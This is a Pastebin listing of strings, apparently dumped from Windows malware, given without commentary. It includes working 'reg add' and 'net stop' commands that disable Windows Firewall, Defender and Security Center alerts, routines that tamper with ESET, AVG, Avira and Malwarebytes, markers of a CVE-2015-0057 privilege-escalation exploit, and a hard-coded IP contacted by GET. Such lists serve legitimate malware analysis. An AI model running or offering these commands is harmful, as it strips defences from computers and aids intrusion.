Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- open
- AppDataDir
- SOFTWARE\ESET\ESET Security\CurrentVersion\Info
- Sorry but i cannot find any installed ESET product :(
- \updfiles
- \lastupd.ver
- \upd.ver
- cmd.exe /c rmdir /S /Q "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- cmd.exe /c md "%s"
- cmd.exe /c attrib +R +S +H /D /S "%s"
- Local AppData
- SYSTEM\CurrentControlSet\services\Avg\SystemValues
- Sorry but i cannot find any installed AVG product :(
- \Avg2015\
- \Avg2014\
- \Avg2013\
- \Avg2012\
- \Avg2011\
- update
- cmd.exe /c rmdir /S /Q "%s"
- \download
- AppDataDirectory
- SOFTWARE\Avira\Antivir Desktop
- Sorry but i cannot find any installed Avira product :(
- Path
- SOFTWARE\Avira\Antivir Desktop
- Sorry but i cannot find any installed Avira product :(
- \TEMP\avwin.ini
- avconfig.exe" /SAVEAVWININI="avwin.ini;"
- ALLUSERSPROFILE
- \Malwarebytes\Malwarebytes Anti-Malware\
- ProgramData
- \Malwarebytes\Malwarebytes Anti-Malware\
- exclusions.dat
- Configuration\settings.conf
- Configuration\scheduler.conf
- exclusions.dat
- Configuration\settings.conf
- Configuration\scheduler.conf
- ProductPath
- SYSTEM\CurrentControlSet\services\MBAMProtector\Parameters
- C:\Program Files\Malwarebytes Anti-Malware
- \mbam.dll
- ProtectionStop
- SchedulerStop
- SelfProtectionDisable
- mbam.exe
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v EnableFirewall /t reg_dword /d 0 /f
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v EnableFirewall /t reg_dword /d 0 /f
- net stop MpsSvc
- net stop WinDefend
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- kernel32
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- IsWow64Process
- GetSystemWow64DirectoryA
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DisableNotifications /t reg_dword /d 1 /f
- kernel32
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DisableNotifications /t reg_dword /d 1 /f
- GetNativeSystemInfo
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f
- kereruthjertr456
- reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- mbam.exe
- reg add HKLM\system\currentcontrolset\Services\SharedAccess /v Start /t reg_dword /d 4 /f
- WinNtM
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f
- WinNtM
- ekrn.exe
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallOverride /t reg_dword /d 1 /f
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- WinNtE
- reg add HKLM\SOFTWARE\Microsoft\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f
- kernel32.dll
- WinNtE
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- avgui.exe
- WinNtAv
- WinNtAv
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- avgnt.exe
- WinNtAr
- WinNtAr
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- kereruthjertr456
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- kereruthjertr456
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- pwned!
- not pwnd!
- SecureZonesTestUpgrade
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SecureZonesTestUpgrade
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\
- HalDispatchTable
- ntdll.dll
- NtQueryIntervalProfile
- NtAllocateVirtualMemory
- NtQuerySystemInformation
- NtFreeVirtualMemory
- HalDispatchTable
- PsInitialSystemProcess
- PsReferencePrimaryToken
- PsLookupProcessByProcessId
- HalDispatchTable
- $$$Secure UAP
- \setup.exe
- runas
- /C "copy "
- " "
- " /Y && "
- " "
- cmd.exe
- SOFTWARE\Microsoft\Updates\Windows XP\SP0
- SOFTWARE\Microsoft\Updates\Windows XP\SP10
- SOFTWARE\Microsoft\Updates\Windows XP\SP3
- SOFTWARE\Microsoft\Updates\Windows XP\SP4
- #32770
- SeDebugPrivilege
- SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
- .exe
- :Zone.Identifier
- FILE1
- RunYourMalwareHere
- RunYourMalwareHereWithHighIntegrityLevel
- GetNativeSystemInfo
- kernel32.dll
- KB2850851
- KB2850851
- GetNativeSystemInfo
- kernel32.dll
- GetNativeSystemInfo
- kernel32.dll
- error running file x64
- svchost.exe
- FAILED get win version
- Failed NtQuerySystemInformation
- Failed small_buffer
- Failed NtQuerySystemInformation2
- exe
- ntdll.dll
- Failed hntdll
- ZwQuerySystemInformation
- Failed pZwQuerySystemInformation
- ZwAllocateVirtualMemory
- Failed pZwAllocateVirtualMemory
- Failed sub_40101A
- PsLookupProcessByProcessId
- user32.dll
- AnimateWindow
- CreateSystemThreads
- Failed FindAnimateWindow_Call
- Failed pZwAllocateVirtualMemory
- Failed pZwAllocateVirtualMemory2
- gwgOTIwghththueryjret
- user32.dll
- GetNativeSystemInfo
- kernel32.dll
- checkarea
- checkarea
- checkarea
- checkarea
- ntdll.dll
- NtQuerySystemInformation
- PsLookupProcessByProcessId
- PsReferencePrimaryToken
- HalDispatchTable
- ntdll.dll
- NtQueryIntervalProfile
- STATIC
- MainWClass
- MainWClass
- STATIC
- SCROLLBAR
- testbox
- testbox
- testbox
- testbox1
- testbox2
- testbox3
- testbox1
- testbox2
- testbox3
- testbox1
- testbox2
- testbox3
- cItems
- cItems
- 3036220
- not admin. trying to exploit...
- success exploited CVE_2015_0057!
- 3036220
- not admin. trying to exploit...
- success exploited!
- medium or low IL, trying to elevate to SYSTEM
- find and replace path
- explorer.exe
- FlattenPath
- gdi32.dll
- SetWindowLongA
- user32.dll
- CreateWindowExA
- user32.dll
- StrStrIA
- shlwapi.dll
- strlen
- ntdll.dll
- DeleteDC
- gdi32.dll
- CreateCompatibleDC
- gdi32.dll
- not admin
- not admin
- admin
- do Inject
- IL > 0
- TULS11
- 93.185.4.90
- GET
- Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 OPR/28.0.1750.48
- LdrLoadDll
- LdrUnloadDll
- LdrEnumerateLoadedModules
- RtlInitUnicodeString
- RtlEqualUnicodeString
- RtlAddVectoredExceptionHandler
- RtlRemoveVectoredExceptionHandler
- RtlPushFrame
- RtlPopFrame
- RtlGetFrame
- ZwProtectVirtualMemory
- ZwUnmapViewOfSection
- ZwSetContextThread
- wcsrchr
- wcscmp
- memset
- memcpy
- VirtualFree
- ZwMapViewOfSection
- kernel32
- wmploc.dll
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement